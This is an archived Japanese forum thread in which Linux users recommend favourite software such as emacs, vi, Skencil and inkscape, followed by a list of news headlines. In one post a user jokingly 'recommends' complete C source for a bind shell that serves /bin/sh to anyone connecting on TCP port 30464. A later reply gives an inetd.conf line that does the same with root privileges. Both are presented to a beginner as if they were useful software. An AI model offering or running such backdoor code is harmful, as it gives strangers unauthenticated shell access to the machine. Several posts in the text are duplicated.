お前らの気に入ってるソフトをお勧めしろ!
1login:Penguin
04/09/06 15:05ID:ZAlcxoeJ お勧めするのだ!
2login:Penguin
04/09/06 15:07ID:ZAlcxoeJ はっきし言ってLinuxはどんなソフトがあるのかさっぱりわからない
だからお俺にお勧めしろ!
わかったか!
だからお俺にお勧めしろ!
わかったか!
04/09/06 15:14ID:VvaiBtvS
04/09/06 15:26ID:YM/02V0X
emacs
04/09/06 15:34ID:DPEJtAZk
sl
04/09/06 16:04ID:2g2UKqa1
04/09/06 16:05ID:FsCfmoGn
8login:Penguin
04/09/06 16:39ID:xDLPvwx0 vi
04/09/06 17:27ID:RiFPYwNy
Linux使いが使っているソフトと満足度
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
10login:Penguin
04/09/07 01:43ID:69Rew710 −−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
∧_∧
( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
∧_∧
( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
04/09/07 02:17ID:kMUJO5p4
>>10
ちょっとドッキリ
ちょっとドッキリ
12マイク ◆yrBrqfF1Ew
04/09/07 04:38ID:qdKLmqGr これお勧め。
#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
13login:Penguin
04/09/07 05:55ID:+gCTSz/q14login:Penguin
04/09/07 10:53ID:/BPz6lrP >>12コンパイルして実行するとどうなんの?
15login:Penguin
04/09/07 11:06ID:0SdoMy9T 質問です。
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
16マイク ◆yrBrqfF1Ew
04/09/07 22:50ID:fIF/mSYo17login:Penguin
04/09/08 01:22ID:V0EuK6XO >>16
自動インストール機能をつけるとさらに便利になりますね。
自動インストール機能をつけるとさらに便利になりますね。
18login:Penguin
04/09/08 12:27ID:f9HuJ/bE なんでわざわざそんなもん作るのか疑問だ。
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
04/09/14 08:45:59ID:71TUTErY
>>1
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
20login:Penguin
04/09/22 16:59:38ID:2oXCA/J6 >>19 それは何のソフトなんだ?
04/09/22 18:28:16ID:wgu8sVCJ
>>20
あらら、意外と知られていないのかな?
http://sketch.sourceforge.net/
ベクトル系の作画ツールです。Tgif や Illustrator と同種のソフトです。
Python で書かれていて、本体を拡張するための「プラグイン」と「スクリプト」の
2種類の仕組みを備えています。これらも Python で書くことができます。
安定版の 0.6.x 系列はコードが枯れていて安心して使えます。
あらら、意外と知られていないのかな?
http://sketch.sourceforge.net/
ベクトル系の作画ツールです。Tgif や Illustrator と同種のソフトです。
Python で書かれていて、本体を拡張するための「プラグイン」と「スクリプト」の
2種類の仕組みを備えています。これらも Python で書くことができます。
安定版の 0.6.x 系列はコードが枯れていて安心して使えます。
22login:Penguin
04/09/22 19:19:41ID:2oXCA/J604/09/22 23:13:05ID:Xzcln/b5
04/09/22 23:34:16ID:FuynSQLc
sodipodiよりinkscape
04/09/23 00:35:40ID:zNMZSmnc
amaroK
なにげにステキ
なにげにステキ
04/09/23 17:46:42ID:rxkNRC89
どうしてもWindowsでTgifを使いたいので
Cygwin起動でX起動でTgif起動
しています
Cygwin起動でX起動でTgif起動
しています
27login:Penguin
04/09/23 19:16:05ID:uyHWGAJe >>26 Tgif って cygwin 上でビルドできたのかよ!
28login:Penguin
04/09/26 19:41:31ID:mrKK2drP w2xw 最高
29login:Penguin
04/09/26 19:41:52ID:mrKK2drP http://www.h7.dion.ne.jp/~umiumi/
30login:Penguin
04/09/26 21:47:23ID:QX/opqbS 【Macでも】みんなでやろうよWyvern【動くYO!!】
http://etc3.2ch.net/test/read.cgi/entrance/1095583399/l50
1 :名無しさん? :04/09/19 17:43:19 ID:fKw9330w
■公式HP
ttp://www.cabochon.com/
■新規キャラの作り方
Play it now!をクリック
Step1:Create Characterのしたをクリック
なんかちっさいキャラが出てくるので好きな種族を選ぼう
このとき説明が出るから読んどけ
メールアドレスとキャラ名を入力してCreate Character!ボタンをクリック
メールにパスワードが届きます
■クライアントダウンロード・インストール
Win・Mac・Linux/Unixの中からどぞ
■起動・ログイン
Character NameとPasswordを入力してConnectボタン
http://etc3.2ch.net/test/read.cgi/entrance/1095583399/l50
1 :名無しさん? :04/09/19 17:43:19 ID:fKw9330w
■公式HP
ttp://www.cabochon.com/
■新規キャラの作り方
Play it now!をクリック
Step1:Create Characterのしたをクリック
なんかちっさいキャラが出てくるので好きな種族を選ぼう
このとき説明が出るから読んどけ
メールアドレスとキャラ名を入力してCreate Character!ボタンをクリック
メールにパスワードが届きます
■クライアントダウンロード・インストール
Win・Mac・Linux/Unixの中からどぞ
■起動・ログイン
Character NameとPasswordを入力してConnectボタン
04/10/03 07:08:02ID:AGr6Rewr
だれか30のゲームやってみたひといる?
32login:Penguin
04/11/10 14:29:32ID:ddhxt23G ついに使えそうなアウトラインプロセッサを見つけた。
TreePad
ttp://www.treepad.com/linux/treepadlite/
スクリーンショット
ttp://penguin.s4.xrea.com/imgboard/img-box/img20041110142747.png
TreePad
ttp://www.treepad.com/linux/treepadlite/
スクリーンショット
ttp://penguin.s4.xrea.com/imgboard/img-box/img20041110142747.png
33login:Penguin
04/11/24 23:36:53ID:1OSIkhDl xterm
04/11/25 00:15:28ID:eny8L2PW
ターミナル
04/11/25 02:01:19ID:EfCW+AGR
>>32
emacsでよさそう。
emacsでよさそう。
36login:Penguin
2005/08/14(日) 21:01:54ID:l0u96nNv wine
2006/07/27(木) 09:47:55ID:A0q1sPZY
test
2006/07/27(木) 16:42:51ID:ZyFHY0Lf
test
2006/07/27(木) 17:33:09ID:ZyFHY0Lf
test
2006/07/27(木) 18:42:31ID:ZyFHY0Lf
test
2006/07/27(木) 18:43:38ID:QmreDk1p
test
2006/07/27(木) 19:21:14ID:QmreDk1p
test
2006/07/28(金) 07:50:24ID:V+NP2yCe
test
44login:Penguin
2006/09/05(火) 23:52:35ID:BNKh3oEF45login:Penguin
2006/09/06(水) 21:57:54ID:K/FaqCP7 screen,
twm,
vim,
canna,
crafty,
perl,
twm,
vim,
canna,
crafty,
perl,
2006/09/07(木) 00:01:41ID:zJ9VWvB8
java
2006/09/07(木) 00:36:09ID:Uz2ntquP
tgif って手軽で直感的に分かりやすいから簡単な絵には俺も
よく使うんだけど, ちょっと細かく調整しようとすると難しくない?
xfig の方が細かい調整出来たりするんだけど, こっちは使い勝手が
イマイチ直感的で無い… tgif の使いやすさといざという場合の
細かい調整ができるアプリケーションってあるんだろうか?
そんなに高くなくて Linux で走るなら買っても良いんだけど
よく使うんだけど, ちょっと細かく調整しようとすると難しくない?
xfig の方が細かい調整出来たりするんだけど, こっちは使い勝手が
イマイチ直感的で無い… tgif の使いやすさといざという場合の
細かい調整ができるアプリケーションってあるんだろうか?
そんなに高くなくて Linux で走るなら買っても良いんだけど
レスを投稿する
ニュース
- 高市首相、沖縄戦没者追悼式のヤジに言及「聞こえたわけではないが…」「戦争をやめろと言っても、戦争をやっておりません」 [nita★]
- 【W杯】「2位通過、地獄じゃね?」日本、決勝T“暫定版”に衝撃「ブラジル→フランス→イングランド…」★2 [ネギうどん★]
- 【AKB48】花田藍衣との専属契約解除AKB48史上初「体調不良を理由とする遅刻を繰り返し」「特定のファンとの繋がりが発覚」弁護士とも協議 [征夷大将軍★]
- 【株価】日経平均、一時2000円超の下落…前日までの8連騰で過熱感 [蚤の市★]
- 【神戸】冷凍庫から損壊遺体、死亡推定時期は2011年 身元は元住人の男性 胴体で切断、殺人視野に捜査 [煮卵★]
- 「心のない社会つくる足がかり」社民・ラサール氏 国旗損壊罪法反対「モノ言えなくなる」 [少考さん★]
- ハム専 ★3
- かもせん 🦆
- 【地上波/DAZNほか】 FIFAワールドカップ2026 総合スレ★154【メキシコ/カナダ/アメリカ】
- 【MLB】ツインズ vs ドジャース ★2
- 〓たかせん〓
- こいせん1 全レス転載禁止
- 【朗報】高市早苗、戦争やめろとのヤジを完全論破!「いつ、あたいが戦争した?」 [616817505]
- 自民党議員「総理は子供のころ自転車に乗ってましたか?知りたいです!」高市「中学生までは乗ってましたよふふふ☺」 [931948549]
- 【悲報】日本人、高市早苗が沖縄でヤジを受けたことに対してやはり日本は核武装すべきとの結論に至ってしまう😨 [616817505]
- 【悲報】鹿児島の男児行方不明事件、雲行きが怪しくなり始める・・・😨 [398059782]
- 【速報】AKB48、花田藍衣との専属契約解除を発表 代理人の唐澤弁護士「本人から『話し合いはお断りさせてください』」 [509448172]
- ぶっちゃけ今の日本が崩壊したり、外国に侵略されても一般人には何も関係なくない?困るのは政治家や公務員だけでしょ [153736977]